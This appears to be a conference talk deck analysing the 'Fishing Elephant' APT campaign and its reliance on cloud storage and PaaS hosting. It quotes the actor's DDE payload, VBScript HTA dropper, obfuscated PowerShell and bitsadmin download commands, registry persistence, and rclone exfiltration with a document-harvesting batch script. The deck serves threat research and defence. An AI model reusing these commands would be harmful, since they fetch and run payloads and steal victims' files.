Fishing Elephant, or how to build cloud based APT
$ whois mak ● Independent Malware Researcher / Founder of ● Dragon Sector CTF ● RE/Exploit dev ● Automatization / Formal methods ● @maciekkotowicz ● ● Principal Malware Researcher @ ● Senior Researcher @ Kaspersky GReAT
How to build APT-like attack
Payload hosted on cloud-storage services Exfiltration to cloud-storage providers
Payload hosted on cloud-storage services Intermediate stages run on PaaS platforms C2 hosted on PaaS or free hosting platforms Exfiltration to cloud-storage providers
Payload hosted Open source malware on cloud-storage services Open source exploits/vulnerabilities Intermediate stages run on PaaS platforms C2 hosted on PaaS or free hosting platforms Exfiltration to cloud-storage providers
How Fishing Elephant did it
Campaign Summary ● Spear phishing emails with a link to fake Google Drive ● Doc’s look-alike app hosted on heroku dropping malicious hta ● Decoy image hosted on Google Drive opened via launching a browser ● Payload link hinder via url-shortening service bitly and others ● Payload hosted on cloud storage service ( dropbox , yandex disk , asuswebstorage )
SET e "" REF c REF d REF e DDE C:\Programs\Microsoft\Office\MSWord .exe\..\..\..\..\Windows \System32\cmd.exe SET c "" "cmd /c bitsadmin /transfer data /priority high C:\Users\Public\o.hta & start C:\Users\Public\o.hta" SET d ""
< script language=" VBScript " > window.moveTo -3000, -3000 Dim MaCommande,Ws,Ret Set Ws = CreateObject ("wscript.Shell") Ws.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ", "C:\Users\Public\hplogs.exe ", "REG_SZ" MaCommande = "cmd /c bitsadmin /transfer data /priority high 2c94/hplogs.exe C:\Users\Public\hplogs.exe " Ret =,0,True) window.close()
Campaign Summary ● Spear phishing emails with references to internal documents, and current events ● DDE abused to fetch second stage scripts from Dropbox ● No decoy documents, just blank page ● Off the shelf tools ( bitsadmin ) used for downloading ● Payload link hinder via url-shortening service bitly and others
Newest modifications ● Geofencing for first stage hosted on heroku ○ If check failed - redirect to https://www.dropbox[.]com/s/apvco1h77036wgb/os.txt?dl=1 ○ Else redirect to batch code also hosted on dropbox ● certutil used for decoding final payload cmd /b START /MIN /c powershell -ep -nop -w hidden (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T").DownloadFile('ht'+'tps://','C:\Windows\Tasks\certs.txt') certutil -decode C:\Windows\Tasks\certs.txt C:\Windows\Tasks\dnplqs.exe ICACLS "C:\Windows\Tasks\dnplqs.exe" /grant "%computername%":F REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /d "C:\Windows\Tasks\dnplqs.exe"
Open Source Malware
Modded Ares ● Upload file ● Download file ● Zipping file or directory ● Change directory ● Execute cmd.exe commands
Open Source Leaked/Cracked Open Source
powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('[redacted]/rclone.conf?dl=1','rclone.conf'), (New-Object System.Net.WebClient).DownloadFile('','system. exe') , (New-Object System.Net.WebClient).DownloadFile('','tmp.exe');
● system.exe ○ rclone.exe ○ 9b363e52d7c1a96a59964e5ebad6ed8 ● tmp.exe ○ 7z.exe ○ 5e0cfb5f9d4cc24c92c7ebb184d6c9b1
Rclone is a command line program to manage files on cloud storage. [update] type = drive client_id = client_secret = service_account_file = token = {"access_token":"ya29.GlscBYp[redacted]qAVx0sKO4RE5wUCtvx3FLG_nNJ9GQa4liLz7Kxr sXpYzmbRfVO","token_type":"Bearer","refresh_token":"1/r[redacted]Ve4ZdWOqem_eA2ho", "expiry":"2017-12-08T15:08:21.9850685+05:30"} team_drive =
for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p C:\Users\PATOMD~1 /s /m *%%G -d 13-05-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_C_%date:/=.% @path" for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p G: /s /m *%%G -d 01-01-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_G_%date:/=.% @path" cd %appdata% system move --delete-after C:\Users\Public\Window\ update:BD del /q/f/s %TEMP%\*.* del /q/s/f C:\Windows\Tasks\*.txt
Pros of cloud-based/OSS solutions
● Mostly free, easy to set up, few clicks and you have a working hosting ● Hard to figure out from outside who uses a service ● Easy, scriptable access to your assets ● Can kiss code-based attribution goodby ● Good luck getting a provider to take down an account (with some notable exception such as heroku)
Cons of cloud-based/OSS solutions
● Metadata, a lot of metadata
● Metadata, a lot of metadata ... { "kind": "drive#permission", "etag": "\"1Jn1MfFS5e4oWHHjbcjtFXlj934\"", "id": "10242864118326064187", "selfLink": " TWlC_5qsWfu98vuiEq6pC/permissions/10242864118326064 187", "userId": "105520765509160710619", "name": "Bushra Fatima", "emailAddress": "", "domain": "", "role": "owner", "type": "user", } ...
● Metadata, a lot of metadata ● API keys needed for accessing resources
● Metadata, a lot of metadata ● API keys needed for accessing resources ● Cloud operators have a different visibility into your stuff than typical hosters
Fishing Elephant summary ● Relatively new actor (since at least 2017) ● Not sophisticated ○ Lack of in-house developed tools ○ However uses interesting methods to glue attacks together ● Heavy use of PaaS and cloud storage ● Relays on open source tools ● Targets South-East part of Asia ● Probably relays on phishing to get access to email servers ● Hard to catch ;/
Cloud-relaying attacks, summary Pros ● Easy to setup and maintain ● Hard to take down ● Hard to detect ● Hard to attribute Cons ● Leaves a lot of metadata ● Access to accounts shared with victims and researches
Q & A? @malwarelabpl @maciekkotowicz
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